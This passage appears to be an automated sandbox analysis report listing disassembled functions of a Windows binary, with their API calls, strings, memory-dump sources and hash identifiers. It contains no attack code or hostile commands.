                                                                            • Opcode Fuzzy Hash: 6c5f74fe069f14a4aff9ae48fdd386b90bfa80558cfb6d9d8d91663f43a29a77
                                                                            • Instruction Fuzzy Hash: 4921FC712583069AF7383B24AC9A77E2ADDEB51394FA444DEF541821D1EFF4CCC08616
                                                                            Function 00B09EF2 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 278COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B09F3A
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • _get_osfhandle.MSVCRT ref: 00B0A02D
                                                                            • _get_osfhandle.MSVCRT ref: 00B0A03F
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,00000001,?,00000001), ref: 00B0A0E8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: _get_osfhandlememset
                                                                            • String ID: DPATH
                                                                            • API String ID: 3784859044-2010427443
                                                                            • Opcode ID: b79767c6df22b51d8e797fb22f15394f49a2d931671c316e06867b0acd842670
                                                                            • Instruction ID: aea44c2d741ded17f6617dc0d0090641f15b98289e1036cbd993de443588c24f
                                                                            • Opcode Fuzzy Hash: b79767c6df22b51d8e797fb22f15394f49a2d931671c316e06867b0acd842670
                                                                            • Instruction Fuzzy Hash: 21A1E4316002059BC724AF78DC9597BBBF5EF89720F248AD9E456972D1EB30EC81CB51
                                                                            Function 00B24953 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 260timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _get_osfhandle.MSVCRT ref: 00B24A7B
                                                                            • GetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000002,?), ref: 00B24B98
                                                                            • SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?), ref: 00B24BC5
                                                                            • SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?), ref: 00B24BD2
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B24BDC
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00B24C30
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: LocalTime$ErrorLast$_get_osfhandle
                                                                            • String ID: %s$/-.
                                                                            • API String ID: 1033501010-531045382
                                                                            • Opcode ID: 1aad7095432722421d35dfc4b1ef4b6ff06b62082f84ed65523b4b2591856d9b
                                                                            • Instruction ID: 2b6b3c2464bd4843523e7bda85a74ab0abc6b7b40533c7ba64d1eb0d9faaefc2
                                                                            • Opcode Fuzzy Hash: 1aad7095432722421d35dfc4b1ef4b6ff06b62082f84ed65523b4b2591856d9b
                                                                            • Instruction Fuzzy Hash: C7813336B402254ADB24DB78ED4ABBA73E4EF85700F2041EAE40AD79D0EF71DE458718
                                                                            Function 00B26650 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 214registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?), ref: 00B26745
                                                                            • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,02000000,00000000,?,?), ref: 00B267CF
                                                                            • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00B267F6
                                                                            • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00B020B8,00000000,00000002,?,00000000), ref: 00B26867
                                                                            • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000), ref: 00B268A3
                                                                            • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00B268C5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: CloseValue$CreateDeleteOpen
                                                                            • String ID: %s=%s$\Shell\Open\Command
                                                                            • API String ID: 4081037667-3301834661
                                                                            • Opcode ID: d64a68cadabba1a40674c187c7773435728daa989f91ed8f49dee89a378343c8
                                                                            • Instruction ID: f06ea8703232818bd036aa97357c76ab66753ba02dad13768fb528732a82b362
                                                                            • Opcode Fuzzy Hash: d64a68cadabba1a40674c187c7773435728daa989f91ed8f49dee89a378343c8
                                                                            • Instruction Fuzzy Hash: 3B61F775E402359BDB349B24AC49ABA77F8EF54700F0441EAEC0DE7290EA718E44CA91
                                                                            Function 00B264DB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 128registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00B2CD00,00000018,?,?,00B1BFD6), ref: 00B2650F
                                                                            • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00B2CD00), ref: 00B26545
                                                                            • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00B2CD00,00000018,?,?,00B1BFD6), ref: 00B26553
                                                                            • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00B2CD00,00000018,?,?,00B1BFD6), ref: 00B26590
                                                                            • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,00B2CD00,00000018,?,?,00B1BFD6), ref: 00B265AD
                                                                            • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00B020B8,?,00000000,02000000,?,?,?,00000000,00000000,00B2CD00,00000018,?,?,00B1BFD6), ref: 00B265D4
                                                                            • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,00B2CD00,00000018,?,?,00B1BFD6), ref: 00B265EF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: CloseDeleteValue$CreateOpen
                                                                            • String ID: %s=%s
                                                                            • API String ID: 1019019434-1087296587
                                                                            • Opcode ID: a0a032705f2a02bffb7b16201c92bc47cd24733b8e5557eb94d1e8773525f188
                                                                            • Instruction ID: bd71a791fc2cd91c08b5172617a1fa1cb3960c990c8b4d5e65189257428e5900
                                                                            • Opcode Fuzzy Hash: a0a032705f2a02bffb7b16201c92bc47cd24733b8e5557eb94d1e8773525f188
                                                                            • Instruction Fuzzy Hash: 6941F471D40228ABDB315B55AC09EAF7FF8FB96F40F004199F80977290DA264E01DAA0
                                                                            Function 00B07150 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 119COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsnicmpswscanf
                                                                            • String ID: :EOF
                                                                            • API String ID: 1534968528-551370653
                                                                            • Opcode ID: 867385549cc17ff9dce6d8f136f34ad875a4c40eec35dbb97a2174ebf9efbb0e
                                                                            • Instruction ID: 043c997ea045300d738eb9530efccb57506ebc134e1580d0dd7cce4c5e245e0f
                                                                            • Opcode Fuzzy Hash: 867385549cc17ff9dce6d8f136f34ad875a4c40eec35dbb97a2174ebf9efbb0e
                                                                            • Instruction Fuzzy Hash: 81316835E44210ABD720AF54AC49BAABFE8FF02750F1440A9FD82A72D1DF30AD41C7A1
                                                                            Function 00B26035 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 113libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(NTDLL.DLL,00000000,00000000,?,00000000,?), ref: 00B26069
                                                                            • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,NtQueryInformationProcess), ref: 00B2607E
                                                                            • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000480,?), ref: 00B260DC
                                                                            • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000004,00000000), ref: 00B26128
                                                                            • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000002,00000000), ref: 00B2614F
                                                                            • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,?,00000002,00000000), ref: 00B26186
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                                            • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                                            • API String ID: 1580871199-2613899276
                                                                            • Opcode ID: b5c054cb6d78758e2b3b30d9df86f6eed6a31af329a1bfba078bceb6679e8b21
                                                                            • Instruction ID: b17caa4e4ebef56dbfd38b93b66348de1ff78854476d06237d2acc0fb5a7409a
                                                                            • Opcode Fuzzy Hash: b5c054cb6d78758e2b3b30d9df86f6eed6a31af329a1bfba078bceb6679e8b21
                                                                            • Instruction Fuzzy Hash: 594155B4A01229ABEB20DB14DC85E6F77BCFB41745F0044E8A609E3281DB709E45CB65
                                                                            Function 00B1654B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 107fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _wcsicmp.MSVCRT ref: 00B165A4
                                                                            • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,00000000,00000003,08000080,00000000), ref: 00B165D7
                                                                            • _open_osfhandle.MSVCRT ref: 00B165EB
                                                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,?), ref: 00B22092
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                                                            • String ID: con
                                                                            • API String ID: 689241570-4257191772
                                                                            • Opcode ID: 6cb36e78e7a2ec5111e66017ac946d6aa7fd7a8b443385a66f67ab1d4cd8c0c0
                                                                            • Instruction ID: 71d190b9271aa9dde435cf083fa03b982f04758757ad3cd587bbf67eec214eac
                                                                            • Opcode Fuzzy Hash: 6cb36e78e7a2ec5111e66017ac946d6aa7fd7a8b443385a66f67ab1d4cd8c0c0
                                                                            • Instruction Fuzzy Hash: 98313C32A40218AFD7245BA89C89BAF7BEAE755735F704269E812E32D0DF709D40C751
                                                                            Function 00B261A2 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98memoryfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000104), ref: 00B261D7
                                                                            • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000,00000040), ref: 00B26211
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,00000014,00000004), ref: 00B26254
                                                                            • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00B2625B
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 00B2628D
                                                                            • RtlFreeHeap.NTDLL ref: 00B26294
                                                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,00000040), ref: 00B2629B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$FileProcess$AllocCloseCreateFreeHandlePointer
                                                                            • String ID: PE
                                                                            • API String ID: 3093239467-4258593460
                                                                            • Opcode ID: e72331802db7cbbbf2d7386b6aa394fd22196827135c5234c2813c663cdbf631
                                                                            • Instruction ID: 1d3cda017d27eed3f2542eae13cfe4373a4c872330ff9cc84cbab6bd2f08d125
                                                                            • Opcode Fuzzy Hash: e72331802db7cbbbf2d7386b6aa394fd22196827135c5234c2813c663cdbf631
                                                                            • Instruction Fuzzy Hash: 4431E534600324A6EB106BA5AC09FBE77A9EFCAB11F144144F919E71C0DF70DD06C665
                                                                            Function 00B08F21 Relevance: 13.9, APIs: 9, Instructions: 389COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _wcsicmp.MSVCRT ref: 00B08FCD
                                                                            • _wcsicmp.MSVCRT ref: 00B08FE3
                                                                            • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00B09002
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B09013
                                                                              • Part of subcall function 00B0A62F: wcschr.MSVCRT ref: 00B0A635
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmp$AttributesErrorFileLastwcschr
                                                                            • String ID:
                                                                            • API String ID: 2943530692-0
                                                                            • Opcode ID: e5be4357364c7025bac99e2824059e7f417cfefb81d6dac0b2268d9d57ad3cb7
                                                                            • Instruction ID: 7f947f830335b58be25c0fa8beef1db2084f4f8d89ac718ca52582f6719342f1
                                                                            • Opcode Fuzzy Hash: e5be4357364c7025bac99e2824059e7f417cfefb81d6dac0b2268d9d57ad3cb7
                                                                            • Instruction Fuzzy Hash: 7BC12631A00211DBDB24AF788885ABEBBF5FB48710F6484A9E506D72D1FB709E81CB51
                                                                            Function 00B0802C Relevance: 13.7, APIs: 9, Instructions: 175COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B08060
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,00000000,?,00000000), ref: 00B081BE
                                                                              • Part of subcall function 00B0DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000), ref: 00B0DCE1
                                                                              • Part of subcall function 00B0DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000,00000000), ref: 00B0DCE8
                                                                            • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000000,-00000001,00000000,?,00000000), ref: 00B0818C
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B08197
                                                                            • longjmp.MSVCRT(00B40A30,00000001,-00000001,00000000,?,00000000), ref: 00B1B09E
                                                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00B27FC9,?,00B299AE,00000000,?,00000000,00B1CF94,00000000,?), ref: 00B1B0AB
                                                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00B27FC9,?,00B299AE,00000000,?,00000000,00B1CF94,00000000,?), ref: 00B1B0C1
                                                                            • fprintf.MSVCRT ref: 00B1B0D5
                                                                            • fflush.MSVCRT ref: 00B1B0E3
                                                                              • Part of subcall function 00B08F21: _wcsicmp.MSVCRT ref: 00B08FCD
                                                                              • Part of subcall function 00B08F21: _wcsicmp.MSVCRT ref: 00B08FE3
                                                                              • Part of subcall function 00B08F21: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00B09002
                                                                              • Part of subcall function 00B08F21: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B09013
                                                                              • Part of subcall function 00B08E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00B48BF0,00000000,?), ref: 00B08EC3
                                                                              • Part of subcall function 00B11CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,00B080F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00B11D3A
                                                                              • Part of subcall function 00B11CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00B080F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00B11D44
                                                                              • Part of subcall function 00B11CD5: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,00B080F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00B11D57
                                                                              • Part of subcall function 00B11CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00B080F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00B11D61
                                                                              • Part of subcall function 00B101F5: wcsrchr.MSVCRT ref: 00B101FB
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Error$Mode$AttributesCriticalFileHeapLastSection_wcsicmpmemset$AllocCurrentDirectoryEnterFullLeaveNamePathProcessfflushfprintflongjmpwcsrchr
                                                                            • String ID:
                                                                            • API String ID: 3753564779-0
                                                                            • Opcode ID: da2db006440f276643993724a29bb90167517db4f990ed87b3d6da0a9b0572c8
                                                                            • Instruction ID: c85b1ec0bf7357ca7369d2d2b3e267d98cac82318ff601d96753e49fcbae00d1
                                                                            • Opcode Fuzzy Hash: da2db006440f276643993724a29bb90167517db4f990ed87b3d6da0a9b0572c8
                                                                            • Instruction Fuzzy Hash: 7251C331A00211ABDB24ABB4DC5AAAF7BF5EF08710F540499E546E72D1EF708E81CB51
                                                                            Function 00B28B6C Relevance: 13.6, APIs: 9, Instructions: 93fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _get_osfhandle.MSVCRT ref: 00B28B7B
                                                                            • FlushFileBuffers.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00B29323,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00B28B83
                                                                              • Part of subcall function 00B0A16C: _close.MSVCRT ref: 00B0A19B
                                                                            • _get_osfhandle.MSVCRT ref: 00B28BB5
                                                                            • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00B28BBD
                                                                            • _get_osfhandle.MSVCRT ref: 00B28BCF
                                                                            • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00B28BD7
                                                                            • memcmp.MSVCRT(?,?,?), ref: 00B28BED
                                                                              • Part of subcall function 00B1654B: _wcsicmp.MSVCRT ref: 00B165A4
                                                                              • Part of subcall function 00B1654B: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,00000000,00000003,08000080,00000000), ref: 00B165D7
                                                                              • Part of subcall function 00B1654B: _open_osfhandle.MSVCRT ref: 00B165EB
                                                                              • Part of subcall function 00B1654B: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,?), ref: 00B22092
                                                                            • _get_osfhandle.MSVCRT ref: 00B28C1A
                                                                            • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00B28C22
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: File$_get_osfhandle$Pointer$BuffersCloseCreateFlushHandleRead_close_open_osfhandle_wcsicmpmemcmp
                                                                            • String ID:
                                                                            • API String ID: 4208585293-0
                                                                            • Opcode ID: beaacb05ee441a11809039928e4c026490f4da86a4be898718008f506d43973e
                                                                            • Instruction ID: c15daf5c4d135686840455132e1b44e6e1f19487bef83cf8ca965e48b5c46c1a
                                                                            • Opcode Fuzzy Hash: beaacb05ee441a11809039928e4c026490f4da86a4be898718008f506d43973e
                                                                            • Instruction Fuzzy Hash: 4221D175240204AFEB286F34EC4EF7A7BADEF85360F204968F156D62E1EF718C018621
                                                                            Function 00B138D0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 247COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: memset
                                                                            • String ID: %s
                                                                            • API String ID: 2221118986-3043279178
                                                                            • Opcode ID: 0f12ab000363a8d3f3a8c9ea6c43ecf89c4325a0bfc5a10681f9e80ec54a57bf
                                                                            • Instruction ID: 91ccbff7c6623df45fd1173789fee4734f078146d20f7a302dc85920e6960759
                                                                            • Opcode Fuzzy Hash: 0f12ab000363a8d3f3a8c9ea6c43ecf89c4325a0bfc5a10681f9e80ec54a57bf
                                                                            • Instruction Fuzzy Hash: 2D918C716083429BE730DA14D895BEFB7E4FF94744F8049ADE58987190EB34EA84CB52
                                                                            Function 00B0BF70 Relevance: 12.4, APIs: 8, Instructions: 447COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00B0DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000), ref: 00B0DCE1
                                                                              • Part of subcall function 00B0DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000,00000000), ref: 00B0DCE8
